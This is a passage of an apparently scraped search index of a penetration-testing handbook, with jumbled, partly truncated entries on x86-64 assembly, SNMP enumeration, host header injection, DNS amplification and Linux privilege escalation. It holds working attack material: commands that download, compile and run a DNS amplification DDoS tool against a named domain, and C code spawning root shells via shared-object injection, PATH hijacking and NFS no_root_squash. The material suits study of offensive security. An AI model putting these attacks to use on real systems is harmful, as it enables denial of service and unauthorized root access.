[+-]line Seek to line\n| sn/sp ([nkey]) Seek to next/prev location, as specified by scr.nkey\n| so [N] Seek to N next opcode(s)\n| sr pc Seek to register\n| ss Seek silently (without adding an entry to the seek history) > 3s++ ; 3 times block-seeking\n> s 10+0x80 ; seek at 0x80+10","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Seeking » Seeking","id":"322","title":"Seeking"},"323":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » Introduction","id":"323","title":"Introduction"},"324":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Introduction","id":"324","title":"Introduction"},"325":{"body":"Variables in assembly do not exist in the same sense as they do in higher-level programming languages. This is especially true of local variables such as those inside functions. Instead of allocating space for a particular value and having that place be \"named\" according to a variable, the compiler may use a combination of stack and heap allocations as well as registers to achieve behaviour resembling a variable. That being said, there are some parallels with higher-level programming languages as well. When manually programming assembly, it should be noted that variable names are more or less identical to addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Introduction","id":"325","title":"Introduction"},"326":{"body":"Assembly constants cannot be changed during run-time execution. Their value is substituted at assembly-time (corresponding to compile-time substitution for constants in higher-level languages). Consequently, constants are not even assigned a location in memory, for they turn into hard-coded values. 
Defining constants in assembly is done in the following way: equ For example, EXAMPLE equ 0xdeadbeef","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Constants","id":"326","title":"Constants"},"327":{"body":"Static or global variables which are initialised before the programme executes are stored in the .data section. In order to define such a variable, you must give it a name, data size and value. In contrast with constants, such data can be mutated during run-time. The following data size declarations can be used: Declaration Size (in bits) Type db 8 dw 16 dd 32 dq 64 ddq 128 Integer dt 128 Floating-Point The syntax for declaring such variables is as follows: For example: byteVar db 0x1A ; byte variable","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Initialised Data","id":"327","title":"Static Initialised Data"},"328":{"body":"Static uninitialised data is stored in the .bss section. The syntax for allocating such variables is following: Such variables are usually allocated as chunks, hence the required count. The primary data types are as follows: Declaration Size (in bits) resb 8 resw 16 resd 32 resq 64 resdq 128 Some examples: bArr resb 10 ; 10 element byte array wArr resw 50 ; 50 element word array dArr resd 100 ; 100 element double array qArr resq 200 ; 200 element quad array","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Uninitialised Data","id":"328","title":"Static Uninitialised Data"},"329":{"body":"Data representation refers to the way that values are stored in a computer. For technical reasons, computers do not use the familiar base-10 number system but rather avail themselves of the base-2 (binary) system. 
Under this paradigm, numbers are represented as 1's and 0's.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Introduction","id":"329","title":"Introduction"},"33":{"body":"snmpwalk is a much more versatile tool for SNMP enumeration. Its syntax is mostly the same as snmp-check:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmpwalk","id":"33","title":"SNMP Enumeration using snmpwalk"},"330":{"body":"When storing an integer value, there are two ways to represent it - signed and unsigned - depending on whether the value should be entirely non-negative or may also have a \"-\" sign. Based on the number of bits used for storing a value, the value may have a different range. Size Range Size Unsigned Range Signed Range Byte (8 bits) 28 [0..255] [−128..+127] Word (16 bits) 216 [0..65,535] [−32,768..+32,767] Doubleword (32 bits) 232 [0..4,294,967,295] [−2,147,483,648..+2,147,483,647] Quadword (64 bits) 264 [0..264−1] [−263..+263−1] Double Quadword (128 bits) 2128 [0..2128−1] [−2127..+2127−1] Unsigned integers are represented in their typical binary form.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Integer Representation","id":"330","title":"Integer Representation"},"331":{"body":"Signed integers are represented using two's complement. In order to acquire the negative form of a number in two's complement, negate all of its bits and add 1 to the result. A corollary of this representation is that it adds no complexity to the addition and subtraction operations.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Two's Complement","id":"331","title":"Two's Complement"},"332":{"body":"Addressing modes refer to the supported methods for accessing and manipulating data. 
There are three basic addressing modes in x86-64: register, immediate and memory.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Introduction","id":"332","title":"Introduction"},"333":{"body":"In register mode addressing, the operand is a register ( brain undergoing nuclear-fission ). mov rax, rbx The value inside rbx is copied to rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Register Mode Addressing","id":"333","title":"Register Mode Addressing"},"334":{"body":"In immediate mode addressing, the operand is an immediate value, or a literal . These are simply constant values such as 10, 0xfa3, \"lol\", and so on. mov rax, 123 The number 123 is copied into rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Immediate Mode Addressing","id":"334","title":"Immediate Mode Addressing"},"335":{"body":"In memory mode addressing, the operand is treated as a memory location. This is referred to as indirection or dereferencing and is similar to how pointers can be dereferenced in C/C++. In assembly, this is done by wrapping the operand in square brackets: []. So for example, rax refers to the value stored within the register rax. However, [rax] means \"treat rax like a pointer and use the value it points to\". Essentially, [rax] treats the value inside the register as an address and uses that address to find the actual value it needs. mov DWORD PTR [rax], 0xdeadbeef The value 0xdeadbeef is copied into the location pointed to by rax. Since memory is byte-addressable, it is oftentimes required to specify how many bytes we want to access. 
This is done by prepending one of the following specifiers to the operand: Specifier Number of Bytes BYTE PTR / byte 1 WORD PTR / word 2 DWORD PTR / dword 4 QWORD PTR / qword 8 Moreover, the actual formula for memory addressing is a bit more complicated, since it was developed mainly for making the implementation of arrays easier. [baseAddr + (indexReg * scaleValue) + offset] The baseAddr must be a register or variable name, although it may be omitted in which case the address is relative to the beginning of the data segment. indexReg is a register which contains an index into the array and the scaleValue is the size (in bytes) of a single member of the array. The offset must be an immediate value. mov eax, dword [ebx] ; move into eax the value which ebx points to\nmov rax, QWORD PTR [rbx + rsi] ; move into rax the value which (rbx + rsi) points to\nmov rcx, qword [rax+(rsi*8)] ; move into rcx the value which (rax + (rsi*8)) points to","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Memory Mode Addressing","id":"335","title":"Memory Mode Addressing"},"336":{"body":"Memory is nothing more than a series of bytes which can be individually addressed. When storing values which are larger than a single byte, the bytes under the x86-64 paradigms are stored in little-endian order - the least significant byte (LSB) at the lowest memory address and the most significant byte (MSB) at the highest memory address. For example, the variable var = 0xDEADBEEF would be represented in memory as follows: Note how the right-most byte is at a lower address and the addresses for the rest of the bytes increase as we go right-to-left.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Endianness","id":"336","title":"Endianness"},"337":{"body":"Below is the general memory layout of a programme: The reserved section is unavailable to user programmes. 
The .text section stores the instructions which comprise the programme's code. Static variables which were declared and given a value at assemble-time are stored in the .data section. The .bss section stores static uninitialised data, i.e. variables which were declared but were not provided with an initial value. If such variables are used before they are initialised, their value will be meaningless. The Stack and the Heap are where data can be allocated at run-time. The Stack is used for allocating space for small amounts of data with a size known at compile-time and grows from higher to lower addresses. Conversely, the Heap allows for the dynamic allocation of space for data of size known at run-time and grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Memory Layout","id":"337","title":"Memory Layout"},"338":{"body":"Registers are value containers which reside on the CPU (separately from RAM). They are small in size and some have special purposes. x86-64 assembly operates with 16 general-purpose registers (GPRs). It should be noted that the 8-byte (r) variants do not exist in 32-bit mode. 64-bit Register Lower 4 Bytes Lower 2 Bytes Lower 1 Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, the lower 16 bits of the rip register (instruction pointer) are inaccessible on their own. For example, the rax register could be set to the following: rax = 0x0000 000AB 10CA 07F0 The name eax would then only refer to the part of the rax register which contains 10CA 07F0. Similarly, ax would represent 07F0, and al would be just F0. 
Additionally, the upper byte of ax, bx, cx and dx may be separately accessed by means of the ah, bh, ch and dh monikers, which exist for legacy reasons.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Introduction","id":"338","title":"Introduction"},"339":{"body":"Not all registers available in the x86-64 paradigm are created equal. Certain registers are reserved for specific purposes, despite being called general-purpose.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Register Specialisation","id":"339","title":"Register Specialisation"},"34":{"body":"Notwithstanding its age, onesixtyone is a good tool which allows you to bruteforce community strings by specifying a file instead of a single string with its -c option. It's syntax is rather simple:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Bruteforce community strings with onesixtyone","id":"34","title":"Bruteforce community strings with onesixtyone"},"340":{"body":"The stack pointer rsp (esp for 32-bit machines) is used to point to the current top of the stack and should not be used for any other purpose other than in instructions which involve stack manipulation.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Stack Pointer rsp","id":"340","title":"The Stack Pointer rsp"},"341":{"body":"The base pointer rbp (ebp for 32-bit machines) is the twin brother of the stack pointer and is used as a base pointer when calling functions. It points to the beginning of the current function's stack frame. Interestingly enough, its use is actually gratuitous because compilers can manage the stack frames of functions equally well without a separate base pointer. 
It is mostly used to make assembly code more comprehensible for humans.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Base Pointer rbp","id":"341","title":"The Base Pointer rbp"},"342":{"body":"The instruction pointer rip (eip for 32-bit machines) points to the next instruction to be executed. It is paramount not to get confused when using a debugger, since the rip does not actually point to the instruction currently being executed.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Instruction Pointer rip","id":"342","title":"The Instruction Pointer rip"},"343":{"body":"The flag register rFlags (eFlags for 32-bit machines) is an isolated register which is automatically updated by the CPU after every instruction and is not directly accessible by programmes. Following is a table of the meaning assigned to different bits of this register. Note that only the lower 32 bits are used even on 64-bit machines. Name Symbol Bit Usage =1 =0 Carry CF 0 Indicates whether the previous operation resulted in a carry-over. CY (Carry) CN (No Carry) 1 Reserved. Always set to 1 for eFlags. Parity PF 2 Indicates whether the least significant byte of the previous instruction's result has an even number of 1's. PE (Parity Even) PO (Parity Odd) 3 Reserved. Auxiliary Carry AF 4 Used to support binary-coded decimal operations. AC (Auxiliary Carry) NA (No Auxiliary Carry) 5 Reserved. Zero ZF 6 Indicates whether the previous operation resulted in a zero. ZR (Zero) NZ (Not Zero) Sign SF 7 Indicates whether the most significant bit was set to 1 in the previous operation (implies a negative result in signed-data contexts). NG (Negative) PL (Positive) Trap TF 8 Used by debuggers when single-stepping through a programme. Interrupt Enable IF 9 Indicates whether or not the CPU should immediately respond to maskable hardware interrupts. 
EI (Enable Interrupt) DI (Disable Interrupt) Direction DF 10 Indicates the direction in which several bytes of data should be copied from one location to another. DN (Down) UP (Up) Overflow OF 11 Indicates whether the previous operation resulted in an integer overflow. OV (Overflow) NV (No Overflow) I/O Privilege Level IOPL 12-13 Nested Task NT 14 Mode MD 15 Resume RF 16 Virtual 8086 Mode VM 17 31-63 Reserved.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Flag Register rFlags","id":"343","title":"The Flag Register rFlags"},"344":{"body":"In addition to the aforementioned registers, the x86-64 paradigm includes 16 registers, xmm[0-15], which are used for 32- and 64-bit floating-point operations. Furthermore, the same registers are used to support the Streaming SIMD Extensions (SSE) which allow for the execution of Single Instruction Multiple Data (SIMD) instructions.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Floating-Point Registers and SSE","id":"344","title":"Floating-Point Registers and SSE"},"345":{"body":"The x86-64 assembly paradigm has quite a lot of different instructions available at its disposal. An instructions consists of an operation and a set of operands where the latter specify the data and the former specifies what is to be done to that data.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Instruction Set » Introduction","id":"345","title":"Introduction"},"346":{"body":"Typically, instruction signatures are represented using the following operand notation. Operand Notation Description Register operand. , , , Register operand with a specific size requirement. Source operand. Destination operand - this may be a register or memory location. Floating-point destination register operand. Immediate value (a literal). Base-10 by default, but can be preceded with 0x to make it hexadecimal. Memory location - a variable name or an address. 
Arbitrary operand - immediate value, register or memory location. .'\">View Me! Here, a new URL is generated based on the value of a parameter $val. Here, the attacker passes the value 123%26action=edit onto the parameter. The URL-encoded value for & is %26. When this gets to the htmlspecialchars function, the %26 gets converted to an &. When the URL gets formed, it becomes And since this is viewed as HTML, an additional parameter has been smuggled! The link would be equivalent to /page.php? action=view&par=123&action=edit This second action parameter could cause unexpected behaviour based on how the server handles duplicate requests.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Client-Side HPP","id":"144","title":"Client-Side HPP"},"145":{"body":"The HTTP Host header is a mandatory header for HTTP requests and specifies the domain name which the client wants to access. This is especially handy with virtual hosting because a single IP address may provide different services on different domains and the server needs to know which page to return to the client. For example, the same machine may serve a blog website at blog.example.com and a git repository at dev.example.com. In order to specify which of the two services the client wants to access, they must specify either the header Host: blog.example.com or dev.example.com, respectively, in their request. A host header injection vulnerability arises when the target application unsafely uses the contents of the Host header, typically in order to construct an absolute URL.","breadcrumbs":"Exploitation » Web » Host Header Injection » Introduction","id":"145","title":"Introduction"},"146":{"body":"This technique involves using Host Header Injection in order to force a vulnerable application to generate a password reset link which points to a malicious domain. This may be leveraged to steal the secret tokens required to reset the passwords of arbitrary users and consequently compromise their accounts. 
Typically applications implement password resetting as follows. The user specifies their username/email. The server generates a temporary, unique, high-entropy token for the user. The server generates a URL for the password reset with the secret token included as a URL parameter. For example, example.com/reset?token=abcdefghijklmnopqrstuvwxyz The server sends an email to the client which includes the generated password reset link. When the user clicks the link in their email, the token in the URL is used by the server in order to determine whose password is being reset and whether or not it is a valid request. If the Host header of the request for a password reset is used in generating the password reset URL, an adversary may leverage it in order to steal the token for an arbitrary user. For example, an adversary could submit a password reset request for a user, e.g. carlos, intercept the request and modify the Host header to point to a domain controlled by them: Host: exploit-server.com. When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request. This type of attack, however, does not always require user interaction because emails are typically scanned, be it to determine if they are spam or if they contain a virus, and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.","breadcrumbs":"Exploitation » Web » Host Header Injection » Password Reset Poisoning","id":"146","title":"Password Reset Poisoning"},"147":{"body":"Check to see if absolute URLs are necessary and cannot be replaced with relative ones. 
If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header. If using the Host header is inevitable, ensure that it is validated against a whitelist of permitted domains. Different frameworks may provide different methods for achieving this. Drop support for additional headers which may permit such attacks, such as the X-Forward-Host header. Do NOT virtual-host internal-only websites on a server which also provides public-facing content, since those may be accessed via manipulation of the Host header.","breadcrumbs":"Exploitation » Web » Host Header Injection » Prevention","id":"147","title":"Prevention"},"148":{"body":"","breadcrumbs":"Exploitation » Windows » Windows","id":"148","title":"Windows"},"149":{"body":"Shell Command Files (SCF) permit a limited set of operations and are executed upon browsing to the location where they are stored. What makes them interesting is the fact that they can communicate through SMB, which means that it is possible to extract NTLM hashes from Windows hosts. 
This can be achieved if you are provided with write access to an SMB share.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » Introduction","id":"149","title":"Introduction"},"15":{"body":"This is the process of discovering active hosts on a network, either for attacking them or assessing the overall network security.","breadcrumbs":"Reconnaissance » Enumeration » Network Scanning","id":"15","title":"Network Scanning"},"150":{"body":"You will first need to create a malicious .scf file where you are going to write a simple (you can scarcely even call it that) script.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » The Attack","id":"150","title":"The Attack"},"151":{"body":"","breadcrumbs":"Exploitation » DNS » DNS","id":"151","title":"DNS"},"152":{"body":"A DNS (Traffic) Amplification attack is a popular form of a distributed denial of service (DDoS) attack, which abuses open DNS resolvers to flood a target system with DNS response traffic. It's called an amplification attack because it uses DNS responses to upscale the size of the data sent to the victim.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » What is DNS Traffic Amplification?","id":"152","title":"What is DNS Traffic Amplification?"},"153":{"body":"An attacker sends a DNS name lookup to an open resolver with the source IP spoofed to be the victim's IP address. That way, any response traffic would be sent to the victim and not the attacker. The requests submitted by the attacker usually aim to query for as much information as possible in order to maximise the amplification effect. In most cases, the queries sent are of type ANY which requests all known information about a particular DNS zone. Using a botnet, it's easy to create immense amounts of traffic. 
It is also rather difficult to protect against these attacks because the traffic is coming from legitimate sources - real DNS servers.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » How does it work?","id":"153","title":"How does it work?"},"154":{"body":"","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Conducting a DNS Traffic Amplification Attack","id":"154","title":"Conducting a DNS Traffic Amplification Attack"},"155":{"body":"We should first check if a DNS Traffic Amplification is possible and if it's viable. We can do this through Metasploit using the module auxiliary/scanner/dns/dns_amp. In the RHOSTS you need to put the IP of the name server you want to test. This module will tell you if a name server can be used in an amplification attack but won't actually execute the attack. Run the scanner:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Testing a DNS server for attack surface","id":"155","title":"Testing a DNS server for attack surface"},"156":{"body":"A simple tool is available only as a proof of concept here . You will need to download and then compile it: wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c gcc -o dnsdrdos dnsdrdos.c -Wall -ansi ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\n--2021-09-21 13:01:11-- https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 15109 (15K) [text/plain]\nSaving to: ‘dnsdrdos.c’ dnsdrdos.c 100%[========================================================================================================================================>] 14.75K --.-KB/s in 0.001s 2021-09-21 13:01:11 (17.9 MB/s) - ‘dnsdrdos.c’ saved [15109/15109] ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ gcc -o dnsdrdos dnsdrdos.c -Wall -ansi Now, create a file containing the IPs of each DNS server you want to use in the attack (only one IP per line). Use the following syntax to run the attack: sudo ./dnsdrdos -f -s -d -l ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ sudo ./dnsdrdos -f dns_servers -s 192.168.129.2 -d nsa.gov -l 30\n----------------------------------------------- dnsdrdos - by noptrix - http://www.noptrix.net/ ----------------------------------------------- ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ The output may be empty, but the packets were sent. You can verify this with Wireshark:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Executing the attack","id":"156","title":"Executing the attack"},"157":{"body":"A flaw of all DNS name servers is that if they contain incorrect information, they may spread it to clients or other name servers. Each DNS name server (even individual clients) has a DNS cache. The system stores there information about any responses it gets for domains it requested. An attacker could inject false entries in this cache and as such, any computer which queries the poisoned name server will receive false results. This is known as DNS cache poisoning . The attack can be used to redirect users to a different website than the requested one. As such, it opens opportunities for phishing attacks by creating evil twins of login portals for well-known sites. A tool for performing such targeted attacks is deserter . 
Usage information is available on its GitHub page.","breadcrumbs":"Exploitation » DNS » DNS Cache Poisoning » Introduction","id":"157","title":"Introduction"},"158":{"body":"","breadcrumbs":"Post Exploitation » Post Exploitation","id":"158","title":"Post Exploitation"},"159":{"body":"","breadcrumbs":"Post Exploitation » Privilege Escalation » Introduction","id":"159","title":"Introduction"},"16":{"body":"Reveals the presence of known vulnerabilities. It checks whether a system is exploitable through a set of weaknesses. Such a scanner consists of a catalog and a scanning engine. The catalog contains information about known vulnerabilities and exploits for them that work on a multitude of servers. The scanning engine is responsible for the logic behind the exploitation and analysis of the results.","breadcrumbs":"Reconnaissance » Enumeration » Vulnerability Scanning","id":"16","title":"Vulnerability Scanning"},"160":{"body":"The first thing you need to do after gaining a foothold on a machine is to look for reused credentials. You should try every password you have gathered on all users, you never know when you might find an easy escalation to root. Next, you should hunt down sensitive files and look for stored credentials in configuration and source files of different applications. Naturally, you should also enumerate any local databases you find. Additionally, SSH keys are something to be on the lookout for. You should also go through the bash history and look for any passwords which were passed as command-line arguments. You should then move on to looking for exploits. Kernel exploits are really low-hanging fruit, so you should always check the kernel version. Subsequently, proceed by enumerating sudo and the different ways to exploit it, for example via Shell Escape Sequences or LD_PRELOAD . Following, you should proceed by tracking down any misconfigurations such as excessive capabilities or SUID Binaries . 
You should check if you have write access to any sensitive files such as /etc/passwd or /etc/shadow, as well as any cron jobs or cron job dependencies. Ultimately, you should move on to enumerating running software and services which are executed as root and try to find vulnerabilities in them which may allow for privilege escalation. This can all be summed up into the following: Credentials Reused Credentials Credentials in Configuration or Source Files Credentials from Databases Credentials in Sensitive Files Credentials from Bash History SSH Keys Exploitation Kernel Exploits Sudo Misconfigurations Excessive Capabilities SUID/SGID Binaries Write Access to Sensitive Files Writable Cron Jobs and Cron Job Dependencies Installed Software Vulnerabilities in Software and Services Running as Root","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Methodology","id":"160","title":"Methodology"},"161":{"body":"The Set Owner User ID (SUID) and Set Group ID (SGID) are special permissions which can be attributed to Linux files and folders. Any files which are owned by root and have SUID set will be executed with elevated privileges. Our goal is to hunt down those files and abuse them in order to escalate our privileges. This can be easily done with the following command: find / -perm -u=s -type f -user root 2>/dev/null","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Introduction","id":"161","title":"Introduction"},"162":{"body":"You should diligently inspect the list of files returned. Some standard Linux binaries may allow for privilege escalation if they have the SUID bit set for one reason or another. It is useful to go through these binaries and check them on GTFOBins . 
In the above example, we find that /bin/systemctl has the SUID bit set and that it also has an entry in GTFOBins : By following the instructions, although with slight modifications, we can run commands with elevated privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Exploiting Misconfigured Common Binaries","id":"162","title":"Exploiting Misconfigured Common Binaries"},"163":{"body":"Some binaries may be vulnerable to Shared Object (SO) Injection. This typically stems from misconfigurations where the binary looks for a specific library in a specific directory, but can't actually find it. If we have write access to this directory, we can hijack the search for the library by compiling our own malicious library in the place where the original one was supposed to be. This is quite similar to escalating via LD_PRELOAD , but it is a bit more difficult to find and exploit. You will first need to identify an SUID binary which has misconfigured shared libraries. A lot of the times the binary will refuse to run, saying that it is missing a particular library, however, this is not always the case: It is always good practice to run the programme with strace, which will print any attempts of the binary to access libraries: strace 2>&1 | grep -iE \"open|access\" What stands out in particular is the /home/user/.config/libcalc.so library, since /home/user/.config/ may be a writable directory. It turns out that the directory doesn't even exist, however, we can write to /home/user/ which means that we can create it. What now remains is to compile a malicious library into libcalc.so. 
#include \n#include static void inject() __attribute__((constructor)); void inject()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} For older versions of GCC, you may need to use the _init() function syntax: #include \n#include void _init()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} Compile the malicious library: gcc -shared -fPIC -o libcalc.so libcalc.c # add -nostartfiles if using _init()","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Shared Object Injection","id":"163","title":"Privilege Escalation via Shared Object Injection"},"164":{"body":"Path Hijacking refers to the deliberate manipulation of environmental variables, most commonly \\$PATH, such that the invocations of programmes in a binary actually refer to malicious binaries and not the intended ones. This vector requires more sophisticated digging into the internals of an SUID binary, specifically tracking down the different invocations the binary performs. This can commonly be achieved by running strings on the binary, but you will probably have to resort to more serious reverse engineering, as well. Specifically, you want to be on the lookout for shell commands which get executed by the SUID binary.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Path Hijacking","id":"164","title":"Privilege Escalation via Path Hijacking"},"165":{"body":"Relative paths are comparably easy to hijack - they require little other than editing the \\$PATH variable. Once you have identified a shell command within an SUID binary which invokes another programme via a relative path, you can just prepend to the \\$PATH a directory which will contain an executable with the same name as the one originally invoked. Let's compile our own malicious binary. 
#include \n#include int main()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\"); return 0;\n} gcc -o /tmp/service /tmp/service.c Afterwards, we need to prepend /tmp to the \\$PATH variable: export PATH=/tmp:\\$PATH And finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Relative Paths","id":"165","title":"Hijacking Relative Paths"},"166":{"body":"Absolute paths require a bit more work to be hijacked. Luckily, bash turns out to be very sophisticated and allows for the creation of functions which have the forward slash (/) character in their name. This means that we can create a malicious bash function with the same name as the absolute path we want to hijack and then our function will be invoked in lieu of the original programme. First, create the bash function: function () { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; } Next, export the function: export -f Finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Absolute Paths","id":"166","title":"Hijacking Absolute Paths"},"167":{"body":"The kernel is the layer which sits between applications and the hardware. It runs with root privileges, so if it gets exploited, privileges can be escalated. Finding kernel vulnerabilities and writing exploits for them is no trifling task, however, once such a vulnerability is made public and exploit code for it is developed, it easily becomes a low-hanging fruit for escalating privileges. A very useful list of kernel exploits found to date is located here . Finding already existing exploits is really easy - just search for the Linux kernel version!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Introduction","id":"167","title":"Introduction"},"168":{"body":"As an example, we are going to exploit dirtyc0w. 
This was a very ubiquitous exploit and can still be found on numerous outdated machines. The exploit itself has many versions but for demonstration purposes we are going to use the one at https://www.exploit-db.com/exploits/40839 . We need to first verify that our kernel version is in the vulnerable range. Inside the exploit we see compilation instructions, which is typical of kernel exploits as they are usually written in C: By compiling and running the exploit (it may actually take some time to execute), we have elevated our privileges!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Exploiting the Kernel","id":"168","title":"Exploiting the Kernel"},"169":{"body":"It is common to see a low-privileged user configured to be able to run some commands via sudo without a password. Luckily, many existing programmes for Linux have advanced capabilities which allow them to do many things such as spawning a shell when run with sudo. If such a programme is configured in the aforementioned way, then there is a shell escape sequence which is a (usually) simple command/argument passed to the programme when run, so that it spawns a shell with elevated privileges when run with sudo. Naturally, these shell escape sequences are programme-specific and it would be inane to try and remember the sequence for every binary. This is where GTFOBins comes in. This is a database of commands (including shell escape sequences) for common Linux binaries which can be used for escalating privileges. We saw in the above list provided by sudo -l that we are allowed to run find as root via sudo. Let's check if there is a shell escape sequence for it. There is! 
We can copy and paste it, then run it with sudo, and we should at last have a root shell: Another example can be given with the awk binary, which we also saw in the list provided by sudo -l.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Shell Escape Sequences » Introduction","id":"169","title":"Introduction"},"17":{"body":"All services which need to somehow interface with the network a host is connected to run on ports and port scanning allows us to enumerate them in order to gather information such as what service is running, which version of the service is running, OS information, etc. Warning Port scanning is very heavy on network bandwidth and generates a lot of traffic which can cause the target to slow down or crash altogether. During a penetration test, you should always inform the client when you are about to perform a port scan. Danger Port scanning without prior written permission from the target may be considered illegal in some jurisdictions. The de-facto standard port scanner is nmap , although alternatives such as masscan and RustScan do exist. Info A lot of nmap's techniques require elevated privileges, so it is advisable to always run the tool with sudo.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Introduction","id":"17","title":"Introduction"},"170":{"body":"The compromised machine may be configured to allow certain directories to be mounted by other machines. You can enumerate such directories by running the following command on the victim machine: cat /etc/exports You can additionally verify this from your attacker machine by running: showmount -e If there is a mountable directory which is configured as no_root_squash, as is the case here, then it can be used for privilege escalation. 
We begin by mounting the target directory from the victim to a directory on our machine: sudo mount -o rw,vers=3 :/tmp /tmp/root_squash Now, if no_root_squash is configured for the mountable directory, then the root user on the attacker machine will get mirrored on the victim machine. In essence, any command run as root on the attacker machine will also be executed as root on the victim! This can allow us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine. This action will be mirrored by the victim and we will essentially have an SUID binary on the target which is all under our control. Let's write a simple malicious C executable: #include \n#include int main()\n{ setuid(0); // Set user ID to root setgid(0); // Set group ID to root system(\"/bin/bash -i\"); // Execute bash now with elevated privileges return 0;\n} It doesn't matter if you create it on the target or the attacker machine, but you must compile it on the target machine in order to avoid library version mismatches: gcc -o nfs_exploit nfs_exploit.c Next, you want to change the ownership of the compiled binary to root on the attacker machine . Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine : sudo chown root:root nfs_exploit\nsudo chmod +s nfs_exploit Finally, execute the malicious binary on the target :","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » NFS Root Squashing » Introduction","id":"170","title":"Introduction"},"171":{"body":"Linux capabilities provide a way for splitting permissions into small units. A binary with particular capabilities can perform certain tasks with elevated privileges. If capabilities are not properly set, or if they are excessive, this may lead to privilege escalation. Binaries with capabilities may be found using the following command: getcap / -r 2>/dev/null A list of all possible capabilities can be found here . 
